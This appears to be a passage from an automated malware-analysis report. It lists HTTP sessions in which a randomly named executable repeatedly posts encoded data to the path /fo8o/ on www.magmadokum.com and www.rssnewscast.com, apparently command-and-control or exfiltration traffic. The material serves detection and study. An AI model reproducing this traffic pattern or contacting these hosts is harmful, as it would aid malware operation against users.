                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.54985285.159.66.93804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:01:21.102893114 CET777OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 48 43 46 59 72 4d 39 61 51 75 33 56 78 63 4f 51 38 59 6d 39 5a 44 32 48 32 7a 46 43 44 33 67 72 48 6b 72 34 47 4d 3d
                                                                                  Data Ascii: k0=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.54986185.159.66.93804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:01:23.780034065 CET797OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 76 4f 58 6c 37 79 54 7a 57 4a 78 6b 30 62 6d 52 59 7a 74 32 69 4e 73 77 7a 43 76 35 30 4d 4d 4a 7a 30 64 67 68 67
                                                                                  Data Ascii: k0=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.54986685.159.66.93804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:01:26.436085939 CET1814OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 73 73 6d 71 37 43 70 61 30 37 78 54 57 4b 4d 33 48 64 70 76 79 6b 44 69 48 69 48 36 48 4c 46 69 4b 68 63 65 38 72 2b 54 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6d 4d 4b 2f 55 2f 4a 4d 4f 73 39 61 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 6c 2b [TRUNCATED]
                                                                                  Data Ascii: k0=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMassmq7Cpa07xTWKM3HdpvykDiHiH6HLFiKhce8r+T0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXmMK/U/JMOs9aQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBoORpWPOJduHh5uXpVuvEsxDtqlVHzP4C83V2BciD6jh4S6IfuEsb550muWnceqjpZzyLMUjqSspZqRKhzaqChBo0BSgiACGCO3NiS+toURxH1cbr4Asre4PUxzDj75BwPzFCgslxA5RscTk4WEk+bCRmOaNg30J49XkrSmC4X/iGbLstKZ/+TwHfwDWCbdQ6zApgNjvoTYeR8Hw1dGOQFcFPta/FQ2Stmx9P86MQwPjea3KS4PVUJS0mUBOaht/UPFEay20NWWi+fqfZG/d2d5TndsbuTUZ1XkAQwkco/3d1C4d3IIm85c+Isp2iJHtRPm0PCDOGoFuWr9zbjbI6mC2oo+9mtb82rZwgxWvBcEqSIoPgX68mpMXfB+GxS8wiAVIg6LcZ43JTeSUmEdWOS9n2l23pEkKGCckJdweFIbk2pBKrxDA4pPfGW5AuMvs+uRkDTNdlWS/4bXYqJV1TJ/SsX72SRqzRbaJd6Z0105PebcTu+euDbNQuFvyY1FEwvx+MGzmrDE747BBulIm5nTvGgehCJqH8jghMMedUadcLcHLEgKBZebl+VoSnbQN7j2txb1iNWNBZagGJ2RM8FxMZs [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.54987485.159.66.93804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:01:29.095707893 CET520OUTGET /fo8o/?k0=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.magmadokum.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:02:30.422030926 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.54998491.195.240.94804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:02:35.940668106 CET780OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 4d 38 45 65 4e 56 32 71 43 59 59 32 64 72 47 6d 77 6a 52 56 68 44 61 6e 55 34 4d 5a 48 58 68 58 54 42 65 30 50 30 3d
                                                                                  Data Ascii: k0=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
                                                                                  Dec 7, 2024 07:02:37.213833094 CET707INHTTP/1.1 405 Not Allowed
                                                                                  date: Sat, 07 Dec 2024 06:02:37 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.54998591.195.240.94804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:02:38.592127085 CET800OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 76 69 33 48 77 37 49 33 32 49 4e 77 52 75 71 59 69 72 31 39 44 73 35 46 2f 48 61 6e 6e 55 34 52 42 43 41 4a 64 66
                                                                                  Data Ascii: k0=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
                                                                                  Dec 7, 2024 07:02:39.868596077 CET707INHTTP/1.1 405 Not Allowed
                                                                                  date: Sat, 07 Dec 2024 06:02:39 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.54998691.195.240.94804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:02:41.250171900 CET1817OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 7a 4c 67 61 41 33 54 2f 58 6f 6d 65 44 6d 76 4b 79 68 45 33 61 76 52 31 66 53 45 79 67 58 6e 59 6b 47 6d 6c 67 4e 56 51 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 50 65 63 43 6a 7a 4b 39 73 77 44 57 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 4a 38 [TRUNCATED]
                                                                                  Data Ascii: k0=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbumzLgaA3T/XomeDmvKyhE3avR1fSEygXnYkGmlgNVQehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUPecCjzK9swDWayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdB9+BuOOEs4LKirthC28h2UyW7au3cW4PlACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iZcESC7N+cDrmgluCEHjfQXc0V2cvBN6bVduPb1dXYDe5/WGT/pCef4uOWdjBYB3f2EIBwROeAD75Mkn4n9Gbm9RO9xHMSnAUWNtBfPdhdkU+HNFMIly/4KFW2Y3PE1IR2k1a68+R8/BBBBOIwVSCGCeSfnbUZzQBeUWLBT22wRNNq+pkmWyRUDpFvf2jyfm3jS5K5KbFyo+Q/N6MUOpbO4V9IW5yGU9dOvkF68jtOUwQnVuE34QDrlXP9Q7Q8RIajk+fsL6l23HbWMc5Rs6ZOhHPv/oN0K9yBpnczxPQwb/nUR7UgEKZD1DjVw/Itpwyrh2mukh9gARKuIkh6Dw0GhJs5mUjJZ5ykBfSPKYkHSaDVs8H6iFEa0XmrFHU8AZOyE6oSxQ5c7MfQUmgtQ950qfdhIgaLeofjVX6RZdPen2hXitfVv/8m4jR37t0NuhY5JWHwSC2h6mRHsY/Wrxf1b0F8wpfgYsZD2q/QAl3ByJjp3n6dvdP3bj+k0a9v6QyqIR5IJSPY60M8iZ [TRUNCATED]
                                                                                  Dec 7, 2024 07:02:42.527017117 CET707INHTTP/1.1 405 Not Allowed
                                                                                  date: Sat, 07 Dec 2024 06:02:42 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
